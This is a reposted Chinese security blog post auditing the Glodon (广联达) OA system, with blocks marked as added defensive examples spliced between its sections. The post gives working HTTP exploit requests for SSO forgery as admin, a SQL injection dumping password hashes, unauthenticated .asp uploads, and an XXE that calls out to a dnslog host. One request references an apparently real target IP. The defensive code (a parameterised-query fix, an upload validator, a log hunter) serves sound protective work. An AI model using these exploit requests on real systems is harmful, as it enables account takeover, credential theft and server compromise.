1day | 广联达 OA System Audit

admin · 2024-01-08 22:16:13 · 197 views


Disclaimer:

Do not use the techniques in this article for unlawful testing. Any direct or indirect consequences or losses arising from the distribution or use of the information in this article are the sole responsibility of the person using it; 小黑说安全 and the author accept no liability.


0x01 Vulnerability Analysis

Arbitrary user login

/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx

The handler for this endpoint is in GetSSOStamp.DLL.

It takes a single usercode parameter and requires no session, so a stamp can be requested for any account, admin in this case:

POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx HTTP/1.1
Host: x
Content-Type: text/xml; charset=utf-8
Content-Length: 355
SOAPAction: "http://tempuri.org/GetStamp"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetStamp xmlns="http://tempuri.org/">
      <usercode>admin</usercode>
    </GetStamp>
  </soap:Body>
</soap:Envelope>

Login endpoint: the values obtained from GetStamp are supplied as LoginCredence and LoginTimestamp, and the session is established as that user:

/Services/Identification/Server/login.ashx?sso=1&ssoProvider=WorkflowSSO&LoginFlag=custom&UserCode=admin&LoginCredence=856F1154F61FE89FDE236B64F565502C&LoginTimestamp=758027442&service=http://xxxxxx/Portal/Frame/layoutA/Default.aspx

SQL injection

/Webservice/IM/Config/ConfigService.asmx
ConfigService inherits directly from WebService; it is easy to see that no permission check is set up, so its methods are reachable without authentication.

The GetIMDictionary method hands the caller's key to ConfigService.getIMDictValue, where it is concatenated directly into the SQL statement. The request below therefore dumps user codes and password hashes from T_ORG_USER through a UNION:

POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1
Host: x
Content-Length: 428
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Content-Type: text/xml; charset=utf-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://180.140.115.138:91/Webservice/IM/Config/ConfigService.asmx?op=GetIMDictionary
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetIMDictionary xmlns="http://tempuri.org/">
      <key>1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --</key>
    </GetIMDictionary>
  </soap:Body>
</soap:Envelope>
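The page shows the concatenation in getIMDictValue only as screenshots. The following Python/SQLite block is an added example, not code from the page or from the product, that reproduces the same pattern next to its parameterised fix. The page's payload is adapted to SQLite syntax (`||` instead of `concat()`, no `TOP`); the dictionary table `T_IM_DICT` with columns `F_KEY` / `F_VALUE` is an assumption, only `T_ORG_USER`, `F_CODE` and `F_PWD_MD5` come from the page, and the rows are constructed sample data.

```python
import sqlite3

# Constructed sample schema for this example, not the real Glodon OA database.
# The page names T_ORG_USER with F_CODE and F_PWD_MD5; the dictionary table
# T_IM_DICT and its columns F_KEY / F_VALUE are assumptions.
SCHEMA = """
CREATE TABLE T_IM_DICT (F_KEY TEXT, F_VALUE TEXT);
CREATE TABLE T_ORG_USER (F_CODE TEXT, F_PWD_MD5 TEXT);
INSERT INTO T_IM_DICT  VALUES ('1', 'im.server=127.0.0.1:5222');
INSERT INTO T_ORG_USER VALUES ('admin',    '21232f297a57a5a743894a0e4a801fc3');
INSERT INTO T_ORG_USER VALUES ('zhangsan', 'e10adc3949ba59abbe56e057f20f883e');
"""

# The page's payload rewritten for SQLite: '||' instead of concat(), no TOP.
PAYLOAD = "1' UNION ALL SELECT F_CODE || ':' || F_PWD_MD5 FROM T_ORG_USER --"


def open_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_im_dict_value_vulnerable(conn, key):
    # Same shape as the getIMDictValue the page describes: the caller-supplied
    # key is spliced into the statement text, so a quote in it ends the literal
    # and everything after it is parsed as SQL.
    sql = "SELECT F_VALUE FROM T_IM_DICT WHERE F_KEY = '" + key + "'"
    return [row[0] for row in conn.execute(sql)]


def get_im_dict_value_fixed(conn, key):
    # Bound parameter: the whole key is compared as a value, never parsed as SQL.
    sql = "SELECT F_VALUE FROM T_IM_DICT WHERE F_KEY = ?"
    return [row[0] for row in conn.execute(sql, (key,))]


if __name__ == "__main__":
    db = open_sample_db()
    print("vulnerable:", get_im_dict_value_vulnerable(db, PAYLOAD))
    print("fixed:     ", get_im_dict_value_fixed(db, PAYLOAD))
```

With the vulnerable function the UNION appends every F_CODE:F_PWD_MD5 pair to the dictionary lookup result; with the bound parameter the same string simply matches no key and returns nothing.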

Unauthenticated arbitrary file upload

Step one: obtain a key

When the incoming cmd parameter is neither queryUplaodResult nor checkFileExists, execution enters ProcessGetAuthorizeKey; an empty cmd satisfies that condition.

It only needs the two parameters destDir and destFilename, and returns a key for that destination:

POST /Services/FileService/UserFiles/GetAuthorizeKey.ashx HTTP/1.1
Host: x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

cmd=&destDir=./sysinfo/&destFilename=qrxyrgwa.asp

Step two: upload

With the three parameters key, destDir and destFilename the file is uploaded and then created at the destination; the .asp below is written exactly as sent, the image/png content-type notwithstanding:

POST /Services/FileService/UserFiles/UserFilesUpload.ashx HTTP/1.1
Host: x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Length: 555

------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="key"

f3c7e655-9ecf-4e81-a7c1-da2e1172ff7b
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="destDir"

./sysinfo/
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="destFilename"

qrxyrgwa.asp
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="file";filename="qrxyrgwa.asp"
content-type:image/png

<% response.write("qrxyrgwa")%>
------WebKitFormBoundarytCOFhbEjc3IfYaY5--
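Two things are missing from the key-then-upload flow above: the key is issued to anyone, and neither step constrains destDir or destFilename. The block below is an added example (not the product's code) of how the two handlers would be hardened: a validator for the destination that rejects traversal and server-executable names, and an authorize key that is only issued to an authenticated user and is an HMAC over that user plus the validated target, so the key from step one cannot be replayed against a different path in step two. The extension allowlist, the upload root, the signing key and the user names are assumptions for the example.

```python
import hashlib
import hmac
import os
import re
import secrets

# Allowlist of document/image types the user-files handler should accept; an
# assumption for this example, the real product's list is not on the page.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".docx", ".xlsx"}
# Extensions IIS hands to the ASP / ASP.NET engines; any of these anywhere in
# the name (x.png.asp, x.asp.png) is refused outright.
SERVER_EXECUTABLE = {".asp", ".aspx", ".asa", ".ashx", ".asmx", ".cer", ".config"}
# Bare name: letters, digits, '_' and '-', then one or more dotted suffixes.
# No separators, no ';', no NUL, so IIS-era "shell.asp;.png" tricks fail here.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+")

# Per-process signing key for the authorize keys (hypothetical; a real server
# would keep this in its configuration).
SERVER_SECRET = secrets.token_bytes(32)


def resolve_upload_target(base_dir, dest_dir, dest_filename):
    """Validate the destDir / destFilename pair and return (ok, path_or_reason).

    base_dir is the only directory the handler may write under; dest_dir and
    dest_filename are the attacker-controlled form fields from the requests above.
    """
    if not SAFE_NAME.fullmatch(dest_filename):
        return False, "destFilename is not a bare, well-formed file name"
    suffixes = ["." + s.lower() for s in dest_filename.split(".")[1:]]
    if any(s in SERVER_EXECUTABLE for s in suffixes):
        return False, "destFilename carries a server-executable extension"
    if suffixes[-1] not in ALLOWED_EXTENSIONS:
        return False, "destFilename extension is not in the allowlist"
    root = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(root, dest_dir, dest_filename))
    if os.path.commonpath([root, target]) != root:
        return False, "destDir escapes the upload root"
    return True, target


def issue_authorize_key(user, base_dir, dest_dir, dest_filename):
    """Step one, hardened: only an authenticated user gets a key, and the key is
    an HMAC over (user, validated target) so step two cannot reuse it elsewhere."""
    if not user:
        return None
    ok, target = resolve_upload_target(base_dir, dest_dir, dest_filename)
    if not ok:
        return None
    msg = user.encode() + b"\0" + target.encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def verify_upload(user, key, base_dir, dest_dir, dest_filename):
    """Step two, hardened: recompute the key for this user and destination and
    compare in constant time before writing anything."""
    expected = issue_authorize_key(user, base_dir, dest_dir, dest_filename)
    return expected is not None and hmac.compare_digest(expected, key)


if __name__ == "__main__":
    base = "/srv/oa/UserFiles"  # assumed upload root
    print(resolve_upload_target(base, "./sysinfo/", "qrxyrgwa.asp"))
    print(resolve_upload_target(base, "../../", "report.png"))
    print(resolve_upload_target(base, "./sysinfo/", "report.png"))
```

The page's own request (destDir=./sysinfo/, destFilename=qrxyrgwa.asp) fails at the executable-extension check before any path is computed; a traversal in destDir fails the root check even when the name itself is harmless.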

Kinggrid (金格) file upload

/GB/LK/Common/ashx/WebRevisionAjax.ashx

The handler speaks Kinggrid's DBSTEP V3.0 format: a header line, base64-encoded name=value fields, then the file body. In the request below the fields decode to OPTION=SAVEFILE and FILENAME=1.asp, so the body 123456 is written out as 1.asp.

POST /GB/LK/Common/ashx/WebRevisionAjax.ashx HTTP/1.1
Host: xxxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 152

DBSTEP V3.0     170              0                1000              
DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
TableKey=MTExMTE=
FILENAME=MS5hc3A=
123456
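The DBSTEP body above is opaque unless the fields are decoded. The following parser is an added example, not Kinggrid's or the page's code; it reads the page's request body (embedded here as constructed sample input) and flags a SAVEFILE whose FILENAME IIS would execute. The three numbers in the header line are passed through untouched, because the page does not explain them, and the executable-extension set is an assumption.

```python
import base64
import binascii
import os

# The request body from the page, reproduced here as constructed sample input.
SAMPLE = (
    "DBSTEP V3.0     170              0                1000              \n"
    "DBSTEP=REJTVEVQ\n"
    "OPTION=U0FWRUZJTEU=\n"
    "TableKey=MTExMTE=\n"
    "FILENAME=MS5hc3A=\n"
    "123456"
)

# Extensions IIS would execute; an assumption for this example.
SERVER_EXECUTABLE = {".asp", ".aspx", ".asa", ".ashx", ".asmx", ".cer"}


def parse_dbstep(body):
    """Split a DBSTEP V3.0 message into (header_numbers, properties, payload).

    Lines after the header are base64-encoded name=value properties up to the
    first line that does not decode as one; everything from there on is the raw
    payload (the file content for SAVEFILE). The header numbers are returned
    untouched: the page does not explain them and nothing here depends on them.
    """
    lines = body.split("\n")
    header = lines[0].split()
    if header[:2] != ["DBSTEP", "V3.0"]:
        raise ValueError("not a DBSTEP V3.0 message")
    props = {}
    i = 1
    while i < len(lines):
        name, sep, value = lines[i].partition("=")
        if not sep or not value:
            break
        try:
            props[name] = base64.b64decode(value, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break  # not a property line: the payload starts here
        i += 1
    return header[2:], props, "\n".join(lines[i:])


def is_dangerous_savefile(body):
    """True when the message is a SAVEFILE whose FILENAME IIS would execute."""
    _, props, _ = parse_dbstep(body)
    if props.get("OPTION") != "SAVEFILE":
        return False
    ext = os.path.splitext(props.get("FILENAME", ""))[1].lower()
    return ext in SERVER_EXECUTABLE


if __name__ == "__main__":
    numbers, props, payload = parse_dbstep(SAMPLE)
    print(numbers, props, repr(payload))
    print("dangerous:", is_dangerous_savefile(SAMPLE))
```

Decoding the sample gives DBSTEP=DBSTEP, OPTION=SAVEFILE, TableKey=11111, FILENAME=1.asp with payload 123456, which is the whole exploit: nothing beyond the file name decides where the bytes land.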


XXE

/GB/LK/Document/DataExchange/DataExchange.ashx

With SystemName=BIM the handler proceeds to the next step, where the Params field is parsed as XML.

An obvious XXE: external entities are resolved, so the SYSTEM URL declared in the DOCTYPE is fetched, which the dnslog callback confirms. (The backticks around whoami in the hostname are not expanded by an XML parser; the DNS lookup of the hostname is the signal.)

POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Sec-Purpose: prefetch;prerender
Purpose: prefetch
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Length: 405

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
    <!ENTITY t SYSTEM "http://`whoami`.mw8goc.dnslog.cn/">
    ]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

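For a defender, the common factor in all five issues above is the set of endpoints involved. The block below is an added example, not from the page, of hunting for them in IIS W3C logs: it correlates a GetSSOStamp.asmx call with a following login.ashx that carries ssoProvider=WorkflowSSO from the same client (the only chain fully visible in logs, because login.ashx puts its parameters in the query string), and flags plain hits on the other audited handlers, whose injection, DBSTEP and XXE payloads travel in POST bodies that IIS does not log. The log excerpt, client addresses and hostnames are constructed.

```python
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Endpoints named in this article, lower-cased for matching, with a tag each.
AUDITED_ENDPOINTS = {
    "/webservice/lk6syncservice/directtoothers/getssostamp.asmx": "sso-stamp",
    "/services/identification/server/login.ashx": "sso-login",
    "/webservice/im/config/configservice.asmx": "sqli-configservice",
    "/services/fileservice/userfiles/getauthorizekey.ashx": "upload-key",
    "/services/fileservice/userfiles/userfilesupload.ashx": "upload-file",
    "/gb/lk/common/ashx/webrevisionajax.ashx": "kinggrid-upload",
    "/gb/lk/document/dataexchange/dataexchange.ashx": "xxe-dataexchange",
}

# Constructed IIS W3C log excerpt (not from the page); fields per the #Fields line.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-08 14:00:01 203.0.113.7 GET /Portal/Frame/layoutA/Default.aspx - 302
2024-01-08 14:00:05 203.0.113.7 POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx - 200
2024-01-08 14:00:06 203.0.113.7 GET /Services/Identification/Server/login.ashx sso=1&ssoProvider=WorkflowSSO&LoginFlag=custom&UserCode=admin&LoginCredence=0123456789ABCDEF0123456789ABCDEF&LoginTimestamp=700000000&service=http://oa.example/Portal/Frame/layoutA/Default.aspx 302
2024-01-08 14:03:10 203.0.113.7 POST /Services/FileService/UserFiles/GetAuthorizeKey.ashx - 200
2024-01-08 14:03:11 203.0.113.7 POST /Services/FileService/UserFiles/UserFilesUpload.ashx - 200
2024-01-08 14:05:00 198.51.100.9 GET /Services/Identification/Server/login.ashx sso=1&ssoProvider=WorkflowSSO&LoginFlag=custom&UserCode=zhangsan&LoginCredence=0000&LoginTimestamp=1&service=http://oa.example/ 200
"""


def parse_w3c(text):
    """Turn W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        row = dict(zip(fields, line.split()))
        row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def hunt(rows, window=timedelta(minutes=5)):
    """Return (tag, client, detail) findings for the audited endpoints.

    A WorkflowSSO login within `window` of a GetSSOStamp call from the same
    client is reported as 'sso-chain' with the UserCode being logged in as.
    """
    findings = []
    last_stamp = {}  # c-ip -> time of that client's most recent GetSSOStamp call
    for r in rows:
        tag = AUDITED_ENDPOINTS.get(r["cs-uri-stem"].lower())
        if tag is None:
            continue
        if tag == "sso-login":
            q = parse_qs(r["cs-uri-query"])
            if q.get("ssoProvider") != ["WorkflowSSO"]:
                continue
            user = q.get("UserCode", ["?"])[0]
            seen = last_stamp.get(r["c-ip"])
            paired = seen is not None and r["ts"] - seen <= window
            findings.append(("sso-chain" if paired else "sso-login", r["c-ip"], user))
            continue
        if tag == "sso-stamp":
            last_stamp[r["c-ip"]] = r["ts"]
        findings.append((tag, r["c-ip"], r["cs-uri-stem"]))
    return findings


if __name__ == "__main__":
    for finding in hunt(parse_w3c(SAMPLE_LOG)):
        print(*finding)
```

On the sample, the first client produces the full stamp-then-login chain as admin followed by the two upload handlers; the second client's WorkflowSSO login has no preceding stamp call from that address and is reported on its own, which still deserves a look since the stamp may simply have been fetched from elsewhere.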

Originally published on the WeChat public account 小黑说安全: 1day | 广联达 OA System Audit

Reposted on CN-SEC; please keep this link when republishing: https://cn-sec.com/archives/2375219.html
